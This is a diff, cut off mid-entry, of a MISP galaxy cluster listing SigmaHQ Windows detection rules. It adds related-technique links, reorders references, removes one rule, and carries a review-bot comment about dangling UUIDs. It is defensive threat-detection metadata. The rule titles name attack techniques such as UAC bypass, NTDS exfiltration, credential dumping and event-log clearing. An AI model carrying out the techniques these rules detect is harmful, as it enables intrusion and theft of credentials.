"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" ], "tags": [ 
@@ -47322,6 +60907,15 @@ "attack.t1222.001" ] }, + "related": [ + { + "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", "value": "File or Folder Permissions Modifications" }, @@ -47348,6 +60942,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "178e615d-e666-498b-9630-9ed363038101", "value": "Suspicious Elevated System Shell" }, @@ -47401,6 +61004,22 @@ "attack.t1218.003" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", "value": "Bypass UAC via CMSTP" }, @@ -47418,9 +61037,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" ], "tags": [ 
@@ -47454,6 +61073,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", "value": "PsExec Tool Execution" }, @@ -47500,6 +61128,15 @@ "cve.2021.26857" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "value": "CVE-2021-26857 Exchange Exploitation" }, @@ -47524,6 +61161,15 @@ "attack.t1027.005" ] }, + "related": [ + { + "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "value": "DefenderCheck Usage" }, @@ -47540,8 +61186,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" ], "tags": [ @@ -47599,6 +61245,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", "value": "Quick Execution of a Series of Suspicious Commands" }, 
@@ -47616,8 +61271,8 @@ "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -47652,6 +61307,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", "value": "UAC Bypass WSReset" }, @@ -47725,6 +61389,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", "value": "DeviceCredentialDeployment Execution" }, @@ -47741,8 +61414,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" ], "tags": [ 
@@ -47753,6 +61426,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", "value": "Office Applications Spawning Wmi Cli Alternate" }, @@ -47777,6 +61473,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", "value": "Service Execution" }, @@ -47802,6 +61507,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "value": "Procdump Usage" }, @@ -47827,6 +61541,15 @@ "attack.t1218.005" ] }, + "related": [ + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", "value": "Mshta JavaScript Execution" }, @@ -47852,6 +61575,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "value": "Ruby Inline Command Execution" }, 
@@ -47876,6 +61608,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", "value": "Suspicious Reg Add Open Command" }, @@ -47902,6 +61643,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", "value": "Renamed PsExec" }, @@ -47926,6 +61676,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", "value": "WSF/JSE/JS/VBA/VBE File Execution" }, @@ -47954,6 +61720,36 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "value": "Suspicious Parent of Csc.exe" }, 
@@ -47980,6 +61776,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" }, @@ -47996,8 +61801,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/threat-detection-report/threats/qbot/", "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://redcanary.com/threat-detection-report/threats/qbot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" ], "tags": [ @@ -48046,8 +61851,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" ], "tags": [ @@ -48055,6 +61860,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", "value": "EvilNum Golden Chickens Deployment via OCX Files" }, @@ -48079,6 +61893,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "value": "Delete Important Scheduled Task" }, 
@@ -48095,8 +61918,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/byt3bl33d3r/CrackMapExec", "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", + "https://github.com/byt3bl33d3r/CrackMapExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" ], "tags": [ @@ -48106,6 +61929,22 @@ "attack.t1027.005" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "value": "CrackMapExec PowerShell Obfuscation" }, @@ -48132,6 +61971,15 @@ "attack.t1027.003" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "value": "Findstr Launching .lnk File" }, @@ -48180,6 +62028,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "value": "Wbadmin Delete Systemstatebackup" }, @@ -48204,6 +62061,15 @@ "attack.t1074.001" ] }, + "related": [ + { + "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", "value": "Zip A Folder With PowerShell For Staging In Temp" }, 
@@ -48214,7 +62080,8 @@ "creation_date": "2019/09/26", "falsepositive": [ "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "filename": "proc_creation_win_susp_eventlog_clear.yml", "level": "high", @@ -48222,8 +62089,10 @@ "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", + "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ @@ -48233,6 +62102,22 @@ "car.2016-04-002" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil" }, 
@@ -48283,6 +62168,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "value": "Write Protect For Storage Disabled" }, @@ -48310,6 +62204,22 @@ "attack.t1134.002" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "15619216-e993-4721-b590-4c520615a67d", "value": "Meterpreter or Cobalt Strike Getsystem Service Start" }, @@ -48334,6 +62244,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "value": "Suspicious Certreq Command to Download" }, @@ -48357,6 +62276,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", "value": "Stop Windows Service" }, 
@@ -48381,6 +62309,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "value": "Process Creation with Renamed BrowserCore.exe" }, @@ -48405,6 +62349,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", "value": "Suspicious Listing of Network Connections" }, @@ -48429,6 +62382,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder" }, @@ -48456,6 +62418,15 @@ "attack.t1083" ] }, + "related": [ + { + "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", "value": "Seatbelt PUA Tool" }, @@ -48481,6 +62452,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", "value": "UAC Bypass Abusing Winsat Path Parsing - Process" }, 
@@ -48505,6 +62485,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", "value": "Suspicious Reg Add BitLocker" }, @@ -48529,6 +62518,15 @@ "attack.t1216.001" ] }, + "related": [ + { + "dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", "value": "Launch-VsDevShell.PS1 Proxy Execution" }, @@ -48554,6 +62552,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "value": "Always Install Elevated Windows Installer" }, @@ -48582,6 +62589,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", "value": "Sdiagnhost Calling Suspicious Child Process" }, @@ -48647,8 +62663,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" ], "tags": [ 
@@ -48680,6 +62696,15 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "value": "Suspicious Shells Spawn by SQL Server" }, @@ -48706,6 +62731,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", "value": "Suspicious Xor PowerShell Command Line" }, @@ -48731,6 +62765,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "value": "UAC Bypass Using MSConfig Token Modification - Process" }, @@ -48747,9 +62790,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://twitter.com/splinter_code/status/1483815103279603714", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" ], 
@@ -48805,6 +62848,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", "value": "Script Interpreter Execution From Suspicious Folder" }, @@ -48832,6 +62884,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "value": "Suspicious PowerShell Cmdline" }, @@ -48848,8 +62909,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" ], "tags": [ @@ -48857,6 +62918,15 @@ "attack.t1218.001" ] }, + "related": [ + { + "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "value": "HH.exe Remote CHM File Execution" }, 
@@ -48873,8 +62943,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" ], "tags": [ @@ -48882,6 +62952,15 @@ "attack.t1560" ] }, + "related": [ + { + "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "value": "Conti NTDS Exfiltration Command" }, @@ -48906,6 +62985,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", "value": "Windows Firewall Disabled via PowerShell" }, @@ -48932,6 +63020,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", "value": "Invoke-Obfuscation VAR+ Launcher" }, 
@@ -48958,31 +63055,6 @@ "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "value": "Suspicious Svchost Process" }, - { - "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_bitstransfer.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", - "value": "Suspicious Bitstransfer via PowerShell" - }, { "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", "meta": { @@ -49004,6 +63076,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "value": "Suspicious NT Resource Kit Auditpol Usage" }, 
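Review bot: The `Suspicious Bitstransfer via PowerShell` entry (uuid `cd5c8085-4070-4e22-908d-a5b3342deb74`) is dropped from the cluster entirely rather than retired in place. Galaxy cluster values are referenced by UUID from events and tags on other MISP instances, so a removed value leaves those references dangling after the next galaxy update; keeping the entry and marking it as withdrawn (for instance a note in its `description` that the upstream rule was removed) would keep the UUID resolvable. If the generator rebuilds the cluster from the current SigmaHQ tree it presumably has no memory of previously emitted UUIDs, so the removal policy should be documented in the galaxy README either way.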
@@ -49030,6 +63111,22 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", "value": "Windows Update Client LOLBIN" }, @@ -49046,8 +63143,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/shantanu561993/SharpChisel", "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/shantanu561993/SharpChisel", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" ], "tags": [ @@ -49055,6 +63152,15 @@ "attack.t1090.001" ] }, + "related": [ + { + "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "tags": [ + 